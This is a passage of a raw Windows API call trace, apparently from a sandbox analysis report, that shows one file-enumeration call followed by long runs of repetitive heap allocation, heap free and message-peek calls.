hHeap=0x6a0000) returned 1 [0184.330] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d9fe10, ftCreationTime.dwHighDateTime=0x1d8a1d3, ftLastAccessTime.dwLowDateTime=0x5811b9f0, ftLastAccessTime.dwHighDateTime=0x1d8a25b, ftLastWriteTime.dwLowDateTime=0x5811b9f0, ftLastWriteTime.dwHighDateTime=0x1d8a25b, nFileSizeHigh=0x0, nFileSizeLow=0xd8e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gEmDK.jpg", cAlternateFileName="")) returned 0 [0184.330] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0184.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0184.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0184.331] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0184.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0184.331] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0184.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0184.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0184.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 